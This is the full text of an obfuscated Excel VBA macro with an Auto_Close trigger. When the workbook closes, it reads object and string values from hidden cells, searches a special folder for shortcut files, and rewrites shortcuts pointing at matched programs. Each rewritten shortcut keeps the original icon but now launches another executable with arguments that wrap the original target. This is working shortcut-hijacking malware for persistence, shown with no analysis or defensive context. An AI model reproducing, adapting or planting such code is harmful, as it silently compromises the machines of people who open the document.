Sub Auto_Close()
Set oRlsCkLV = CreateObject(activeSheet.Range("AZ57").value)
Set NPXUoWz = CreateObject(activeSheet.Range("BB57").value)
Set CtLvSucX = NPXUoWz.GetFolder(oRlsCkLV.SpecialFolders(activeSheet.Range("BE57").value))
For Each dEtnOc In CtLvSucX.Files
If(InStr(Lcase(dEtnOc), ".lnk")) Then
Set OnhZrUVP = oRlsCkLV.CreateShortcut(oRlsCkLV.SPecialFolders(activeSheet.Range("BE57").value) & "\" & dEtnOc.name)
If(InStr(Lcase(OnhZrUVP.targetPath), activeSheet.Range("BG57").value) or InStr(Lcase(OnhZrUVP.targetPath), activeSheet.Range("BI57").value) or InStr(Lcase(OnhZrUVP.targetPath), activeSheet.Range("BJ57").value)) Then
OnhZrUVP.IconLocation = OnhZrUVP.targetpath
OnhZrUVP.arguments = "-w " & activeSheet.Range("BM57").Value & OnhZrUVP.targetPath & "'" & activeSheet.Range("BN57").Value
OnhZrUVP.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BO57").value
if(Len(OnhZrUVP.arguments) < 1023) Then
OnhZrUVP.save
end if
end if
end if
next dEtnOc
End Sub
